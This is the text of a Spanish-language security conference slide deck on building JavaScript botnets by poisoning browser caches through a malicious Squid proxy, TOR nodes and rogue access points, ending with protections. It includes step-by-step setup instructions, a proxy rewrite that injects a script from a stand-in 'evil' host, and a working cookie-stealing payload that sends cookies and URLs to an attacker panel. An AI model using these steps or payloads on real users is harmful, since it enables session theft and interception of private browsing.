En esta sesión se verá el funcionamiento de las javascript botnets, se analizarán entornos de despliegue y explotación, y acciones que pueden llevarse a cabo. Además, la sesión mostrará resultados de un estudio realizado a través de servidores proxy, nodos TOR y Rogue APs, que han permitido desplegar un sistema de prueba.

1. Owning "bad" guys {and mafia}
with Javascript botnets
Chema Alonso & Manu “The Sur”

4. ¡Qué se
infecten
ellos!

6. Man in the Middle
• Interceptación de comunicaciones entre
clientes y servidores
• Canal comprometido … p0wned seguro
• Red:
– ARP Spoofing
– Rogue DHCP(6)
– ICMPv6 Sppofing, SLAAC
• DNS Spoofing

7. Man in the Browser
• Plugins para interceptar navegación
– BHO
– Addons
• Acceso a todo el navegador
– Passwords
– Código
• Troyanos Bancarios
– “Tengo un ruso en mi IE”

8. JavaScript in the Middle
• Envenenamiento de la caché del navegador
• No es permanente:
– Si se borra la caché, se elimina la infección
• Todo archivo cacheado se usa si no ha expirado
• Permiten introducir código javascript remoto
• Acceso a:
– Cookies
• Salvo HTTPOnly (more or less)
– Código HTML
– Campos introducidos en formularios
– URL
– Ejecución de código remoto
– …

9. Google Analytics js y malware

10. ¿Cómo meterlo?
• XSS Permanentes
• Owneando HTTP Servers
• Ataques Man In the middle de red
• Ataques a memcache
• Imaginación….

11. - Framework para infectar la caché de navegadores
- Inyecta un javascript en cliente
- Ese javascript va incluyendo los mismos payloads
- http://beefproject.com
- Muy conocido

12. ¿Cómo hacer una Botnet usando
Javascript?

13. ¿TOR?

14. Fácil, Fácil….

15. Cómprate un Server barato, barato

16. Monta un Proxy con SQUID
GET / HTTP/1.1 GET / HTTP/1.1
Host: www.web.com Host: www.web.com
Response Response
Home.html Home.html
GET /a.jsp HTTP/1.1 GET /a.jsp HTTP/1.1
Host: www.web.com Host: www.web.com
Response
Response
a.Jsp + pasarela.js
a.jsp
include http://evil/payload.js
GET /payload.js HTTP/1.1
Host: evil

17. Configura squid y haz que no expiren
Squid.conf: Activar URL rewrite program
.htaccess: Que no expiren los objetos de Apache

18. Infecta todos los .js

19. Inyecta tu javascript en el cliente

20. Distribuye tu Proxy

21. Deja que Internet haga el resto

22. Prepara Payloads: 1 robar cookies
document.write(“
<img id='domaingrabber'
src='http://X.X.X.X/panel/
domaingrabber.php?id=0.0.0.0&
domain="+document.domain+"&
location="+document.location+"&
cookie="+document.cookie+"'
style='display:none;'/>");

23. Prepara Payloads 2: robar forms

24. Disfruta

25. ¿Quién usa esto?

26. Mafias: El Nigeriano

27. Mafias: El Nigeriano

28. Mafias: El Nigeriano

29. Mafias: El Nigeriano

30. Mafias: El Nigeriano

31. Mafias: Depredadores

32. Mafias: Depredadores

33. Mafias: Depredadores

34. Mafias: Depredadores

35. Mafias: Depredadores

36. Mafias: Depredadores

37. Mafias: Depredadores

38. Estafador: El pobre perro

39. Estafador: El pobre perro

40. Psicopatas

41. Preocupados por el anonimato

42. Preocupados por el anonimato

43. El del business de leer

44. El hacker…

45. … que estaba hackeando…

46. … que estaba hackeado

47. Intranet

48. Y por supuesto Pr0n

49. Pr0n

50. Prepara Payloads: infecta webs

51. Ataque dirigido a sitios
• Selección objetivo
– Banco
– Red Social
– Intranet
• Analiza los js que carga
• Payload:
– Inclusión de payloads en cualquier página que
navegue.

52. Demo

53. Protecciones
• Cuidado con los mitm
– Proxy
– Redes TOR
• Política de
descontaminación
• Navega sin caché
• VPNs no son protección

54. ¿Preguntas?
chema@informatica64.com
mfernandez@informatica64.com